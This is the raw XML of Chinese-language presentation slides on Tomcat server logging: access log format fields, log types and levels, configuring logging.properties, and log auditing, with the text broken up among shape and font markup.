            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular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%l </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>访问逻辑用户名，通常返回</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'-'</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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访问验证用户名，通常返回</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'-'</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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访问日时</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular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访问的方式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(post</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>get)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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>访问的资源和使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>协议版本</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular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访问返回的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>状态</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="165100" indent="-152400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="*"/>
              <a:tabLst>
                <a:tab pos="165100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%b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访问资源返回的流量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6240" y="3811270"/>
            <a:ext cx="365760" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365759" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="365759" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365759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74420" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1074420" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1074420" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107442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91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>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务器运行日志</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074419" y="1944623"/>
            <a:ext cx="10751820" cy="1076325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10751820" h="1076325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10751820" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751820" y="1075944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="107594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0406" y="1939175"/>
            <a:ext cx="10761345" cy="1087120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10761345" h="1087120">
                <a:moveTo>
                  <a:pt x="10756506" y="1086738"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1086738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1086510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1085837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1084783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1083449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1081976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268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077213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1077213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1081976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="1081976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761027" y="1083449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10760354" y="1084783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10759300" y="1085837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10757979" y="1086510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="1086738"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="108712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761345" h="1087120">
                <a:moveTo>
                  <a:pt x="10751743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0751743" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="1087120">
                <a:moveTo>
                  <a:pt x="10751743" y="1081976"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10751743" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="1077214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="1077213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="1081976"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="1087120">
                <a:moveTo>
                  <a:pt x="10761268" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10756506" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="1087120">
                <a:moveTo>
                  <a:pt x="9525" y="1081976"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1077213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1077213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1081976"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="1087120">
                <a:moveTo>
                  <a:pt x="10751743" y="1081976"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1081976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1077213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="1077213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="1081976"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="1087120">
                <a:moveTo>
                  <a:pt x="10761268" y="1081976"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10751743" y="1081976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="1077213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="1077214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="108197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4419" y="3512820"/>
            <a:ext cx="10751820" cy="2307590"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10751820" h="2307590">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10751820" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751820" y="2307336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="230733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0406" y="3507295"/>
            <a:ext cx="10761345" cy="2318385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10761345" h="2318385">
                <a:moveTo>
                  <a:pt x="10756506" y="2317851"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2317851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2317622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2316949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2315895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="2314562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1076126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308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761027" y="2314562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10760354" y="2315895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10759300" y="2316949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10757979" y="2317622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="2317851"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="231838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761345" h="2318385">
                <a:moveTo>
                  <a:pt x="1075174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751743" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="2318385">
                <a:moveTo>
                  <a:pt x="10751743" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10751743" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="2318385">
                <a:moveTo>
                  <a:pt x="10761268" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10756506" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="2318385">
                <a:moveTo>
                  <a:pt x="9525" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="2318385">
                <a:moveTo>
                  <a:pt x="10751743" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751743" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10761345" h="2318385">
                <a:moveTo>
                  <a:pt x="10761268" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10751743" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10756506" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10761268" y="2313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490073"/>
            <a:ext cx="1656080" cy="426402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R="98425" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="944"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3422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20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mc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at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运行</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="526415">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="745"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tomcat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日</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7524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catalina</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="106045" algn="r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每类日志</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="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SEVERE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日志级别的</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="54610" algn="r">
              <a:lnSpc>
                <a:spcPts val="2155"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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conf/l</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="526415">
              <a:lnSpc>
                <a:spcPts val="2155"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>示例：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="105410" algn="r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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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 marR="5461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R="105410" algn="r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禁用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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 marR="5461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R="41910" algn="r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输出</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="5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 marR="5461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1009" y="1642570"/>
            <a:ext cx="8207375" cy="410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905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日志的类型与级别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sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>志分为下面５类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67945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、 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>localhost </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>manager </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>admin </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="3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host-manager</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="10096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级别分为如</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>下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种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2019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highest value) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WARNING </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&gt; INFO &gt; CONFIG &gt; FINE &gt; FINER &gt; FINEST (lowest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value)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设定方法</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="455"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ogging.properties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中的内容，设定某类日志的级别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01600" marR="34810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alina </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>日 志 的 级 别 为 ： </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FINE  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>alina.org.apache.juli.FileHandler.level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FINE  alina </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>日 志 的 输 出 ：  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>alina.org.apache.juli.FileHandler.level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OFF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alina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所有的日志消息均输出：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151765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alina.org.apache.juli.FileHandler.level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91659" y="1555661"/>
            <a:ext cx="9305544" cy="4937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2383" y="3811270"/>
            <a:ext cx="1499870" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1499870" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1499615" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499615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155700" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1155700" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1155192" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11551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95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latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>m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spc="-65" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>日志的审计方法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155191" y="2337816"/>
            <a:ext cx="9537700" cy="2307590"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9537700" h="2307590">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9537192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9537192" y="2307335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="230733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0188" y="2332507"/>
            <a:ext cx="9547860" cy="2318385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9547860" h="2318385">
                <a:moveTo>
                  <a:pt x="9542907" y="2317851"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2317851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2317622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2316937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2315883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="2314562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2313089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308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547428" y="2314562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9546755" y="2315883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9545701" y="2316937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9544367" y="2317622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="2317851"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="231838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9547860" h="2318385">
                <a:moveTo>
                  <a:pt x="9538144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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2318385">
                <a:moveTo>
                  <a:pt x="9538144" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
